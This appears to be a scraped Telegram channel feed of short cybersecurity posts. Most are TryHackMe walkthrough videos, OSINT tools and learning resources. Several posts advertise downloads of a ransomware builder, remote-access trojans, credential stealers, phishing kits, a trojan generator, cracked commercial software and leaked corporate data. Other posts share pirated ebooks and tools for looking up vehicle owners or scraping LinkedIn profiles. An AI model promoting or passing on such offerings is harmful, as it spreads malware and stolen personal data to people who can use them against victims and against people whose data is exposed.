2023-12-22 09:23:05
https://www.nickcybertech.dev/2023/12/decoding-cryptojacking-understanding.html Images
2023-12-22 08:23:16
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟮𝟭𝗚𝗲𝘁 𝘀𝘁𝗮𝗿𝘁𝗲𝗱 𝘄𝗶𝘁𝗵 𝗗𝗘𝗩𝗦𝗘𝗖𝗢𝗣𝗦 𝗣𝗮𝗿𝘁-𝟮🤓𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/YCaUW1cFjh0?si=TmAh_TVPxqyPpvzO
2023-12-22 04:06:32
जैसा की आप सब लोग जानते हि होंगे की काफी सारे अधर्मी काफी कोशिशें कर रहे है सनातन धर्म को ठेस पहुंचने की तो उसी के लिए यह चैनल बनाया गया है !!इस चैनल मे हम सनातन धर्म से जुड़ी हुई जितनी भी गलतफैमिया या गलत बातें फैलाई जारी है उनका खंडन किया जायेगा ओर सनातन धर्म की शिक्षा दी जाएगी !!https://t.me/sanatandharmCDI
2023-12-22 01:56:30
None
2023-12-21 13:58:14
How to host static website on cloudflare pages for free ? | Cloudflare pages tutoriallink : https://youtu.be/1Z3KrdSJcDk?si=HbZ-dkHKYolFd1qDcredits : @cybertrickzone @protocolnick
2023-12-21 13:53:40
#Important AnnouncementWe are asking for help in showing some support in growing our YouTube channel.We have a lot of amazing topics and content in our bucket list but we are unable to create that due to shortage of time. We wanted to hire a editor but can't due to lack of budget. If you can support our channel in promoting it in your channel, groups or on social media, it will help us in gaining more audience which will help us in joining the YouTube monetization faster.https://youtube.com/@OSINTAMBITIONPlease promote our channel wherever you can, would be greatful for this.Note - Please don't subscribe with your own fake account or account of your friends and family who have no interest in our content. We need genuine subscribers who are interested in learning OSINT and about other cool internet stuff.
2023-12-21 10:14:32
Introducing a new OSINT tool for phone number and email.🕵️‍♂️ Frustrated with slow OSINT progress due to manual work? Streamline personal info gathering withX-Ray ContactAccess data from premium providers in one place for deeper insights. Try for free now. 👉 x-ray.to/3RSElLvShare your experience in comment.Join @osintambition for more #osint #cybersec
2023-12-21 07:00:32
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟮𝟬𝗚𝗲𝘁 𝘀𝘁𝗮𝗿𝘁𝗲𝗱 𝘄𝗶𝘁𝗵 𝗗𝗘𝗩𝗦𝗘𝗖𝗢𝗣𝗦🤓𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/D1yyMOts5wE?si=-ux_8zoH6AUM7ldrPlease like & Subscribe to our YouTube channel🙌
2023-12-20 22:05:40
👾GX40 Ransomware Builder : Download📟RogueSliver - C2 Framework : Download📯HookBot Android Malware Leak : Download🪬SQL-Login-Bypass Script : Download📍Anti-kill PHP Trojan Generator : Download🕸Nvidia Corporation Leak : Download🐲CVE-2023-35078 Exploit : Download99 Cents Only Stores Data Leak : Download
2023-12-20 08:25:09
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟭𝟵𝗟𝗲𝗮𝗿𝗻 𝘄𝗵𝗮𝘁 𝗶𝘀 𝗠𝗲𝗺𝗼𝗿𝘆 𝗙𝗼𝗿𝗲𝗻𝘀𝗶𝗰𝘀🤯𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/GG2QbJZPjMY?si=CLfF890_u3SPVvOSPlease like & Subscribe to our YouTube channel🙌
2023-12-20 07:05:29
📌RCE in Juniper JunOS CVE-2023-36844-47 Exploit : Download🪅Pocket Access – Telegram Bot For Remote Access To Computer Files : Download🐸International Civil Defense Organization Data Leak : Download🤖CVE-2023-40930 POC: Skyworth 3.0 (Android) – Directory Traversal : Explore🕸Invicti Standard v23.9.0.42095 Crack : Download📯Sartrouville Company France Data Leak : Download🌚Aranui Cruises Data Leak : Download🐀Craxs Rat V6.7 : DOwnload🪬URL Infection: Exploit Silent Java Drive By Downloads Chrome : Explore🧮CVE-2023-41362 – MyBB ACP RCE Exploit : Explore 👾CVE-2023-3244 POC: WordPress Missing Authorization: Explore📍OpenText EnCase Forensic Tool : Download🐲Telegram Get remote IP: Get IP Address on Other Side Audio Call In Telegram : Check
2023-12-19 23:46:18
None
2023-12-19 13:55:55
None
2023-12-19 13:11:51
🔰 List of Cryptography Tools used in CTFs 🔰Decoder 1: www.dcode.fr/symbols-ciphersDecoder 2: cryptii.comDedcoder 3: gchq.github.io/CyberChefDecoder 4:  crackstation.netRot Decoder: theblob.org/rot.cgiTwin Hex: www.calcresult.com/misc/cyphers/twin-hex.html➡️ Give 100+ Reaction 🤟
2023-12-19 11:31:55
New video uploaded now.https://youtu.be/xlhSrZrg-mQNot something new, I just feel this info should be shared, so just created it. Next video will be interesting.Join @osintambition for more.
2023-12-19 09:09:44
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟭𝟴𝗟𝗲𝗮𝗿𝗻 𝘄𝗵𝗮𝘁 𝗶𝘀 𝗘𝗿𝗮𝗱𝗶𝗰𝗮𝘁𝗶𝗼𝗻🤔𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/2rBRg4o0-dE?si=H7P8Q0yEaRcRNPUfPlease like & Subscribe to our YouTube channel🙌
2023-12-18 13:21:44
None
2023-12-18 07:32:15
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟭𝟳𝗟𝗲𝗮𝗿𝗻 𝗵𝗼𝘄 𝘁𝗼 𝗔𝗻𝗮𝗹𝘆𝘇𝗲 𝗧𝗿𝗮𝗳𝗳𝗶𝗰 📊 𝗶𝗻 𝗖𝘆𝗯𝗲𝗿 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆😎𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/TaZLiHFmTD0?si=7WjfMBPwvq53pntSPlease like & Subscribe to our YouTube channel🙌
2023-12-18 07:21:03
Phone Number OSINTA free tool to find some cool information using phone number like- country- region- carier name- line type- active line statushttps://www.ipqualityscore.com/free-hlr-lookup/Enter phone number in international format and see the cool information.Subscribe to our YouTube for not missing our upcoming Phone Number OSINT Series. https://youtube.com/@OSINTAMBITIONJoin @osintambition for more.
2023-12-18 04:26:46
None
2023-12-17 14:10:09
👾Craxs Rat V6.7 : Download🧮Evilginx3 Phishlets : Download🐲Chrome-extention Stealer V2 : Download🕸Invicta Stealer: A Powerful, Native Stealer : Download🪬Remcos Rat 3.8.0 Cracked : Download📟NSA Equation Group Hacking Tools Leaked : Download
2023-12-17 13:56:40
🇮🇳India became first country to demonstrate the capability of engagement of 04 aerial targets simultaneously at 25Km ranges by command guidance using single firing unit. The test was conducted by IAF using Akash Weapon System.- DRDO
2023-12-17 09:36:58
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟭𝟲𝗟𝗲𝗮𝗿𝗻 𝗠𝗮𝗰𝗵𝗶𝗻𝗲 𝗟𝗲𝗮𝗿𝗻𝗶𝗻𝗴 𝗣𝗮𝗿𝘁-𝟯 🤖 𝗶𝗻 𝗖𝘆𝗯𝗲𝗿 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆😱𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/QEhZZk1SQK8?si=tMh-ufs5aJksfaXSPlease like & Subscribe to our YouTube channel🙌
2023-12-17 04:18:33
Link: https://thepowerhost.in Images
2023-12-17 03:29:12
CrackCodes 🇮🇳 pinned «»
2023-12-17 03:29:03
None
2023-12-16 12:53:21
None
2023-12-16 10:47:44
Any google ads experts here if yes plz dm @mynk0x00
2023-12-16 06:48:06
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟭𝟱𝗟𝗲𝗮𝗿𝗻 𝗠𝗮𝗰𝗵𝗶𝗻𝗲 𝗟𝗲𝗮𝗿𝗻𝗶𝗻𝗴 𝗣𝗮𝗿𝘁-𝟮 🤖 𝗶𝗻 𝗖𝘆𝗯𝗲𝗿 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆😎𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/y-WtNFFx5qs?si=OI2FugvY2OirHplGPlease like & Subscribe to our YouTube channel🙌
2023-12-16 06:24:30
None
2023-12-16 03:52:09
🙏🏼🇮🇳 Images
2023-12-15 13:44:57
None
2023-12-15 08:39:25
CrackCodes 🇮🇳 pinned «»
2023-12-15 08:39:11
None
2023-12-15 08:09:40
None
2023-12-14 14:16:36
A better version of this video is now available on Youtube. Soon, we will be starting Phone Number OSINT series, proabably from Monday.Watch the new video here https://youtu.be/IuM29ntKMNU
2023-12-14 13:17:08
None
2023-12-14 07:49:57
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟭𝟯𝗟𝗲𝗮𝗿𝗻 𝗜𝗻𝘁𝗿𝘂𝘀𝗶𝗼𝗻 𝗗𝗲𝘁𝗲𝗰𝘁𝗶𝗼𝗻🧐𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/3h4SBD3LLL0?si=luzgrwydwr0_hNQ2Please like & Subscribe to our YouTube channel🙌
2023-12-14 04:32:57
None
2023-12-13 22:37:17
TRYHACKME OSCP ROADMAP # Level 1 - Intro- [ ] OpenVPNlnkd.in/dpxHjrtN- [ ] Welcomelnkd.in/d3t_AC4N- [ ] Intro to Researching lnkd.in/dxRR2mCV- [ ] Learn Linux lnkd.in/ds9aJqhA- [ ] Crash Course Pentesting lnkd.in/dCT8VvvpIntroductory CTFs to get your feet wet- [ ] Google Dorking lnkd.in/dBnRpSyq- [ ] OHsint lnkd.in/dDhikJkB- [ ] Shodan lnkd.in/dy9a4t-C# Level 2 - Tooling- [ ] Tmux lnkd.in/djqaA_Wc- [ ] Nmap lnkd.in/dHfVFjeK- [ ] Web Scanning lnkd.in/dkp8dKnn- [ ] Sublist3r lnkd.in/d69wJm4H- [ ] Metasploit lnkd.in/dsy3sY9s- [ ] Hydra lnkd.in/dg4hZA-h- [ ] Linux Privesc lnkd.in/drKTQiSj- [ ] Web Scanning lnkd.in/dkp8dKnnMore introductory CTFs- [ ] Vulnversity - lnkd.in/d5b-bqPz- [ ] Blue - lnkd.in/dpa5R5wf- [ ] Simple CTF lnkd.in/d2dxPVX4- [ ] Bounty Hacker lnkd.in/dWdnv3Hz# Level 3 - Crypto & Hashes with CTF practice- [ ] Crack the hash lnkd.in/danFHdPZ- [ ] Agent Sudo lnkd.in/dEXNdG6z- [ ] The Cod Caper lnkd.in/dBUvrZ-g- [ ] Ice lnkd.in/dW5tUzv6- [ ] Lazy Admin lnkd.in/dVAJkf5p- [ ] Basic Pentesting lnkd.in/dVNq_JCa# Level 4 - Web- [ ] OWASP top 10 lnkd.in/dQx2Hbr2- [ ] Inclusion lnkd.in/dmTFjN-r- [ ] Injection lnkd.in/dt7x7KHs- [ ] Vulnversity lnkd.in/d5b-bqPz- [ ] Basic Pentesting lnkd.in/dVNq_JCa- [ ] Juiceshop lnkd.in/dkUjtqYi- [ ] Ignite lnkd.in/dkRY4UDk- [ ] Overpass lnkd.in/dgGT72mQ- [ ] Year of the Rabbit lnkd.in/dgAGTRtV- [ ] DevelPy lnkd.in/dKpBkHMy- [ ] Jack of all trades lnkd.in/dJbxj73D- [ ] Bolt lnkd.in/dMCYzbfmFollow @cybertrickzone for more resources. #tryhackme #oscp #infosec
2023-12-13 15:19:51
None
2023-12-13 12:16:02
🚀 Unleash the Power of AWS Privilege Escalation! 💻✨Dive into my latest video where I unravel the mysteries of AWS with not one, not two, but THREE scenarios on Privilege Escalation! 🕵️‍♂️🔍🔒 IAM PutRolePolicy📝 IAM CreatePolicyVersion🔄 IAM PassRoleMaster these key maneuvers and elevate your AWS game! 🚀 Ready to level up? Check out the video now! 👉https://youtu.be/LpfHk7DbIL0
2023-12-13 07:52:06
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟭𝟮𝗟𝗲𝗮𝗿𝗻 𝗗𝗲𝗳𝗲𝗻𝘀𝗲 𝗶𝗻 𝗗𝗲𝗽𝘁𝗵 😍𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/66BztCDnkpg?si=goVVAjEK0942XtH7Please like & Subscribe to our YouTube channel🙌
2023-12-13 03:31:41
None
2023-12-12 19:58:28
How to analyze and Decrypt hash values? | Hashing tutorial in cyber security | Educational Purposesvideo link : https://youtu.be/LBStRFbiXOIlike share subscribe support our channelcredits : @cybertrickzone
2023-12-12 18:26:08
https://cybertrickszone.quora.com/?invite_code=hcSHEFJfECxvIQxrFjIM
2023-12-12 08:50:34
⚡ Update5 suicide bombers, 24 Killed, 34 injured in Pakistan, Dera Ismail khan attack.Earlier, Taliban commander said , "Pakistan does not know 'Real Islam', we will teach them 'True Islam".
2023-12-12 07:20:44
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟭𝟭𝗟𝗲𝗮𝗿𝗻 𝗔𝗰𝘁𝗶𝘃𝗲 𝗗𝗶𝗿𝗲𝗰𝘁𝗼𝗿𝘆 😍𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/AY3BGrNJz84?si=VB-FuvT8kN43Y71UPlease like & Subscribe to our YouTube channel🙌
2023-12-12 02:47:40
https://system32.ink/building-a-free-burp-collaborator-with-cloudflare-workers/
2023-12-11 10:17:46
None
2023-12-11 07:30:02
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟭𝟬𝗟𝗲𝗮𝗿𝗻 𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 😍𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/iPmEuNQQKQo?si=IWgS-YuvcD1WP6pVPlease like & Subscribe to our YouTube channel🙌
2023-12-11 06:27:36
CrackCodes 🇮🇳 pinned «»
2023-12-11 05:37:53
JOIN OUR CYBER TRICKS ZONE WHATSAPP CHANNELLINK :- https://whatsapp.com/channel/0029VaGK9Jw5Ui2fHbdhX421@cybertrickzone
2023-12-11 03:37:38
New blog in OSINT Ambition How to use Python Sitemap Generator for OSINT? by @cybdetectivehttps://publication.osintambition.org/how-to-use-python-sitemap-generator-for-osint-77bc69fa165d#osint #infosec #cybersec #python #webosint #linux
2023-12-11 00:25:43
None
2023-12-10 23:41:00
Moon Knight on Hunt as Unknown Gun Man....
2023-12-10 21:21:35
BACKEND DJANGO FRAMEWORK PAID EBOOKS PDFS GDRIVE - https://drive.google.com/drive/folders/1BCXZT05j1xni1qU3Gq2dxjXKqyIPMslSSHARED BY @protocolnick @cybertrickzone
2023-12-10 15:01:56
CYBER TRICKS ZONE COMMUNITYTHIS COMMUNITY REPRESENTS 3 MAIN OUR YOUTUBE CHANNEL FOR YOU :-1. CYBERTECH WITH NIKHIL (FOR INTERNET, FB TECH TRICKS, CYBER SECURITY, TERMUX TOOLS ETC)CHANNEL LINK :- https://youtube.com/@CyberTechwithNikhil?si=2ud5fkvdintGIWfW2. NIKHIL CYBER TECH :- THIS IS THE BACKUP CHANNEL OF CYBERTECH WITH NIKHIL (FOR INTERNET TIPS HACKS, TERMUX TOOLS ETC)CHANNEL LINK :- https://youtube.com/@NikhilCyberTech?si=AMkf2KpQN6vEz2x53. NICK YT NATION :- THIS CHANNEL IS FOR SLOWED REVERB BOLLYWOOD SONGS AS WELL AS INTERNATIONAL SONGS, REMIX, DJ SONGS, LOFI, STATUS VIDEOS ETCCHANNEL LINK:- https://youtube.com/@nickytnation?si=wSohjfp5aWAoQk8XTELEGRAM:- https://t.me/about_cybertrickszoneHttps://t.me/cybertrickzoneLink tree :- https://bio.link/cybertrickzone
2023-12-10 07:28:24
None
2023-12-09 11:51:28
CrackCodes 🇮🇳 pinned «कोई promotion करदो मेरी वैबसाइट का , आपकी अति कृपा होगी| Do some promotion of my website, you will be very grateful. মোৰ ৱেবছাইটৰ কিছু প্ৰচাৰ কৰক, আপুনি অতি কৃতজ্ঞ হ 'ব। আমার ওয়েবসাইটের কিছু প্রচার করুন, আপনি খুব কৃতজ্ঞ হবেন। મારી વેબસાઇટનો થોડો પ્રચાર…»
2023-12-09 11:51:15
कोई promotion करदो मेरी वैबसाइट का , आपकी अति कृपा होगी|Do some promotion of my website, you will be very grateful.মোৰ ৱেবছাইটৰ কিছু প্ৰচাৰ কৰক, আপুনি অতি কৃতজ্ঞ হ 'ব।আমার ওয়েবসাইটের কিছু প্রচার করুন, আপনি খুব কৃতজ্ঞ হবেন।મારી વેબસાઇટનો થોડો પ્રચાર કરો, તમે ખૂબ આભારી રહેશો.എന്റെ വെബ്സൈറ്റിന്റെ കുറച്ച് പ്രമോഷൻ നടത്തുക, നിങ്ങൾ വളരെ നന്ദിയുള്ളവരായിരിക്കും.எனது வலைத்தளத்தை விளம்பரப்படுத்துங்கள், நீங்கள் மிகவும் நன்றியுள்ளவர்களாக இருப்பீர்கள்.ਮੇਰੀ ਵੈੱਬਸਾਈਟ ਦਾ ਕੁਝ ਪ੍ਰਚਾਰ ਕਰੋ, ਤੁਸੀਂ ਬਹੁਤ ਸ਼ੁਕਰਗੁਜ਼ਾਰ ਹੋਵੋਗੇ।
2023-12-09 08:29:29
Hey Hunters and penetesters bringing up the new version of Subprober which even become better than other tools for your information gather in penetration testing and other works now subprober is becoming a very efficient tool for pobing and gathering vital information for your targets and you dont have look on terminal now because subprober will show its task and for more visit: https://github.com/sanjai-AK47/Subprober
2023-12-09 08:13:02
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟴𝗟𝗲𝗮𝗿𝗻 𝗗𝗶𝗴𝗶𝘁𝗮𝗹 𝗙𝗼𝗿𝗲𝗻𝘀𝗶𝗰🧐🔥𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/cHovP7R4VHo?si=2nWwa98C6ACT5T8zPlease like & Subscribe to our YouTube channel🙌
2023-12-09 06:02:07
None
2023-12-08 14:30:12
https://system32.ink/evilginx-webpanel/
2023-12-08 11:02:09
https://system32.ink/blind-css-exfiltration/
2023-12-08 09:58:55
None
2023-12-08 06:56:20
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟳𝗔𝗻𝗮𝗹𝘆𝘇𝗶𝗻𝗴 𝘁𝗵𝗲 𝗟𝗼𝗴𝘀 😎🔥𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/5O1L1M9Dg9s?si=Qly33pjm02bK3j2fPlease like & Subscribe to our YouTube channel🙌
2023-12-07 10:29:15
None
2023-12-07 07:03:05
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟲𝗟𝗲𝗮𝗿𝗻 𝗪𝗵𝗮𝘁 𝗶𝘀 𝗠𝗲𝗺𝗼𝗿𝘆 𝗖𝗼𝗿𝗿𝘂𝗽𝘁𝗶𝗼𝗻🔥𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/dljy-fchoik?si=DhU2SVcjuGJTy-uTPlease like & Subscribe to our YouTube channel🙌
2023-12-07 03:45:22
https://t.me/Indianshunters
2023-12-07 03:30:27
None
2023-12-06 14:48:05
ScrapedIn -A tool to scrape LinkedIn without API restrictions for data reconnaissancehttps://github.com/dchrastil/ScrapedInDetailed video with demo is coming soon on YouTube.Join @osintambition for more.#osint #osinf #cyber #infosec #linkedin #privacy #security
2023-12-06 12:58:19
None
2023-12-06 07:17:04
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝘀 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟱𝗟𝗲𝗮𝗿𝗻 𝗛𝗼𝘄 𝘁𝗼 𝗥𝗲𝘃𝗲𝗿𝘀𝗲 𝗘𝗻𝗴𝗶𝗻𝗲𝗲𝗿 𝗮𝗻 𝗔𝗽𝗽𝗹𝗶𝗰𝗮𝘁𝗶𝗼𝗻😨𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗩𝗶𝗱𝗲𝗼:https://youtu.be/8GvU3wIMEZE?si=GAyVNq3VczzvQarZPlease like & Subscribe to our YouTube channel🙌
2023-12-06 05:18:43
Full-time only. Applications on Email only. 🔺@AngrySaffron Images
2023-12-06 03:21:11
https://system32.ink/sebua-browser-update-attack/
2023-12-05 16:46:50
𝗙𝗶𝗻𝗮𝗹𝗹𝘆 𝘁𝗵𝗲 𝗦𝘁𝗿𝗶𝗸𝗲 𝗵𝗮𝘀 𝗯𝗲𝗲𝗻 𝗥𝗲𝗺𝗼𝘃𝗲𝗱 🥳𝗪𝗮𝘁𝗰𝗵 𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗗𝗮𝘆-𝟰 𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵: https://youtu.be/qLusVF1owU0?si=kXfDTMpWTx60giSA
2023-12-05 12:55:20
None
2023-12-05 08:22:00
🔖#SEARCH ENGINES FOR PENTESTERS01. shodan.io —> (Server , Vulnerabilities)02. google.com —> (Dorks)03. wigle.net —> (Wifi Networks)04. grep.app —> (Codes Search)05. app.binaryedge.io —> (Threat Intelligence)06. onyphe.io —> (Server)07. viz.greynoise.io —> (Threat Intelligence)08. censys.io —> (Server)09. hunter.io —> (Email Addresses)10. fofa.info —> (Threat Intelligence)11. zoomeye.org —> (Threat Intelligence)12. leakix.net —> (Threat Intelligence)13. intelx.io —> (OSINT)14. app.netlas.io —> (Attack Surface)15. searchcode.com —> (Code Search)16. urlscan.io —> (Threat Intelligence)17. publicwww.com —> (Code Search)18. fullhunt.io —> (Attack Surface)19. socradar.io —> (Threat Intelligence)20. binaryedge.io —> (Attack Surface)21. ivre.rocks —> (Server)22. crt.sh —> (Certificate Search)23. vulners.com —> (Vulnerabilities)24. pulsedive.com —> (Threat Intelligence)— Share & Support Us —➯ Channel : @cybertrickzone
2023-12-05 07:04:00
here's a 28 list of websites to learn cybersecurity:1. Cybrary2. Coursera3. edX4. Udemy5. Kali Linux Official Site6. SecurityTube7. SANS Internet Storm Center8. Hack The Box9. OverTheWire10. OWASP11. MIT OpenCourseWare12. Carnegie Mellon University's Software Engineering Institute13. Cisco Networking Academy14. PentesterLab15. OpenSecurityTraining.info16. StationX's The Academy17. Cyber Aces18. InfoSec Institute19. HackerRank20. EC-Council's iClass21. Pwnable.kr22. Google's Gruyere23. Cyber Degrees24. Hacksplaining25. Security Tutorials26. Root Me27. Hakin928. OWASP WebGoat
2023-12-05 06:12:23
𝗧𝗿𝘆𝗛𝗮𝗰𝗸 𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟰Creating 𝗖𝘂𝘀𝘁𝗼𝗺 𝗪𝗼𝗿𝗱𝗹𝗶𝘀𝘁 & 𝗙𝘂𝘇𝘇𝗶𝗻𝗴 𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲 - 𝗣𝗮𝘀𝘀𝘄𝗼𝗿𝗱 😍𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵: https://youtu.be/k1WfwaUusSo?si=L4qZCuaDHRUm0pafPlease Like & Subscribe to our YouTube Channel😄
2023-12-05 03:27:46
Vehicle OSINTYou can find the following details by just knowing the vehicle number(RC) - 1. Ownership details2. Vehicle details3. Insurance details4. Current challans(Works only for Indian Vehicle)Download the below app and go to RC search, enter the number and that's it.https://play.google.com/store/apps/details?id=com.cuvora.carinfoJoin @osintambition for more. Images
2023-12-04 06:37:46
𝗧𝗿𝘆𝗛𝗮𝗰𝗸 𝗠𝗲 𝗔𝗱𝘃𝗲𝗻𝘁 𝗼𝗳 𝗖𝘆𝗯𝗲𝗿 𝗗𝗮𝘆-𝟯𝗕𝗿𝘂𝘁𝗲 𝗳𝗼𝗿𝗰𝗶𝗻𝗴 𝗣𝗮𝘀𝘀𝘄𝗼𝗿𝗱😍𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵: https://youtu.be/tbNuQH8vFMUPlease Like & Subscribe to our YouTube Channel😄
2023-12-04 05:56:31
Linux Distribution for #OSINT Credit: @cybdetective 1. OSINTUXhttps://www.osintux.org/2. BackBoxhttps://www.backbox.org/3. OSINTBoxhttps://github.com/Dimaslg/osintBOX4. CSI Linuxhttps://csilinux.com/5. ArchStrikehttps://archstrike.org/6. Offen Osinthttps://github.com/Double2Sky/OffenOsint7. Huron Osinthttps://github.com/HuronOsint/OsintDistro 8. Septor Linuxhttps://septor.sourceforge.io/9. Pentoo Linuxhttps://www.pentoo.ch/10. Tsurugi Linuxhttps://tsurugi-linux.org/downloads.php11. TraceLabs OSINT VM. : https://www.tracelabs.org/initiatives/osint-vmJoin @osintambition for more.#osint #cybersec #infosec #security
2023-12-03 15:47:18
None
2023-12-03 10:20:24
Moye moye😂
2023-12-03 07:33:53
https://t.me/Akhand_Aryavart📌 Join Guys 📌
2023-12-03 07:31:23
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗖𝘆𝗯𝗲𝗿 𝗔𝗱𝘃𝗲𝗻𝘁 𝗗𝗮𝘆- 𝟮𝗟𝗲𝗮𝗿𝗻 𝗣𝘆𝘁𝗵𝗼𝗻 & 𝗝𝘂𝗽𝘆𝘁𝗲𝗿 😍𝗪𝗮𝗹𝗸𝘁𝗵𝗿𝗼𝘂𝗴𝗵: https://youtu.be/MPjm-g0Uq5Q?si=C7-ZZsDlozN4syzQPlease Like & Subscribe to our YouTube channel😄
2023-12-03 07:14:15
Practice your OSINT Skillshttps://sourcing.games/This is a beginner friendly website which have good challenges for recruiters and sources but they are also good for practising your OSINT skills.Many people have asked me where we can practice our OSINT skills, so here you go.Interested in OSINT, checkout our blogs at https://www.osintambition.org/Join @osintambition for more.
2023-12-02 13:54:51
hey guy a new tool bringing here for all to find blind cross site scripting the tool is mainly build for hunterd, testet and hackers to test for blind cross site scripting . The tool can be used with other tools even also with subdominator in oneliners so you can detect blind xss into subdomains and getting bounties with these automation to know and support the open source project you visit the given link and open source tool also best and I develop these tool for all to make our open source community get improve so give your support guys!: https://github.com/sanjai-AK47/Bxss_Sniper
2023-12-02 06:51:01
𝗧𝗿𝘆𝗛𝗮𝗰𝗸𝗠𝗲 𝗖𝘆𝗯𝗲𝗿 𝗔𝗱𝘃𝗲𝗻𝘁 𝗶𝘀 𝗵𝗲𝗿𝗲 😍🥳𝗦𝘁𝗮𝗿𝘁 & 𝗟𝗲𝗮𝗿𝗻 𝘄𝗶𝘁𝗵 𝗨𝘀🔥𝗟𝗶𝗻𝗸: https://youtu.be/mwdMBxPT3I8?si=-kUNHghhRKjk-6rwPlease Like & Subscribe to our YouTube channel☺️
